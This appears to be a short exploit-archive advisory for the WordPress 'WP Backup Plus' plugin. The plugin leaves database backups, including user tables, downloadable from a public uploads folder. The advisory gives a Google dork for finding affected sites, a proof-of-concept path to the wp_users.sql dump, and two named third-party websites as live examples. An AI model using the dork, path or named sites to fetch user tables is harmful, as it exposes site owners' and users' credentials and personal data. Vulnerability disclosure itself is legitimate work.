Home / exploitsPDF  

WordPress Backup Plus Backup Disclosure

Posted on 21 May 2015

# WordPress 'WP Backup Plus' Plugin Exposure Backup File to Unauthorized Control # CWE: CWE-530 # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 15/05/2015 # Vendor Homepage: http://wpbackupplus.com/ # Google Dork: inurl:/wp-content/uploads/wp-backup-plus/ # PoC : http://SITE.COM/wp-content/uploads/wp-backup-plus/temp/wp_users.sql OR "Other Table Name". # Examples: http://easy-family-boating-recipes.com/wp-content/uploads/wp-backup-plus/temp/cnb24p_users.sql http://bestsolarpanelsmelbourne.com.au/wp-content/uploads/wp-backup-plus/temp/wp_users.sql

 

TOP